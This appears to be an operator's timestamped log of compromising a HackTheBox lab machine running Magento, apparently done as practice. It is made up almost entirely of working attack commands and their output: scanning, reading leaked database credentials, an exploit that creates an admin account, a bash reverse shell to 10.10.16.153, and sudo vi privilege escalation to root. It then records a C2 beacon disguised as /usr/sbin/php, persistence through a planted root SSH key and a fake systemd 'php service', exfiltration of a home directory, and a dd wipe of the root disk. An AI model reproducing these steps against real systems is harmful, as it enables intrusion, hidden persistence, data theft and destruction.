2025-04-06T06:56:22-04:00
sudo apt install -y nmap curl python3-venv make zip unzip
sudo openvpn --config htb.ovpn

### T1 10.129.232.125

ping -c 1 10.129.232.125
nmap -sV -T4 10.129.232.125
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
up, ports open
magneto software
10.129.232.125 swagshop.htb
curl -L http://swagshop.htb/app/etc/local.xml
python3 cli.py repl
set --target 10.129.232.125
🏁 Done! Here's what we found:
Install Date: Wed, 08 May 2019 07:23:09 +0000
Hostname: localhost
Username: root
Password: fMVWh7bDHpgZkyfqQXreTjU9
Database Name: swagshop
Crypt Key: b355a9e0cd018d3f7f03607141518419
python3 poc.py http://swagshop.htb create-user --username ypwq --password 123
🛶 Attempting to create a new user with the following creds:
username: ypwq
password: 123
🏁 Worked! Check 10.129.232.125/admin with creds ypwq:123
👉 Set username to ypwq and password to 123

2025-04-06T07:05:09-04:00
python3 -m venv venv
source venv/bin/activate
python3 -m pip install mechanize
nc -l -p 4444
python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.153/443 0>&1'"

2025-04-06T07:28:47-04:00
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
uid=0(root) gid=0(root) groups=0(root)

2025-04-06T07:29:51-04:00
generate beacon --http http://10.10.16.153:4444 --seconds 20 --os linux
http --lport 4444
curl -s -L http://10.10.16.153:8080/php -o /usr/sbin/php
chmod +x /usr/sbin/php
/usr/sbin/php

2025-04-06T07:38:36-04:00
root_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As=
mkdir /root/.ssh/
upload /home/user/swag/2025-04-06/out/root_rsa.pub /root/.ssh/authorized_keys
chmod /root/.ssh/authorized_keys 0400
cat /etc/ssh/sshd_config
#PermitRootLogin prohibit-password
ssh -vvv root@10.129.232.125 -i out/root_rsa -T /bin/bash

2025-04-06T07:44:04-04:00
mv /tmp/.php /usr/sbin/php
php service
[Unit]
Description=php service
After=network.target

[Service]
Type=simple
Restart=always
RestartSec=1
ExecStart=/usr/sbin/php

[Install]
WantedBy=multi-user.target
upload -o /home/user/swag/2025-04-06/out/php.service /lib/systemd/system/php.service
execute systemctl daemon-reload
execute systemctl enable php.service
execute systemctl start php.service

2025-04-06T07:48:54-04:00
find
download /home/haris/ -r
/bin/dd if=/dev/zero of=/dev/mapper/swagshop--vg-root
2641 2415 root x86_64 /bin/dd

2025-04-06T08:06:25-04:00
terminate -F 1

2025-04-06T08:12:04-04:00
all processes and services non-responsive

2025-04-06T08:20:52-04:00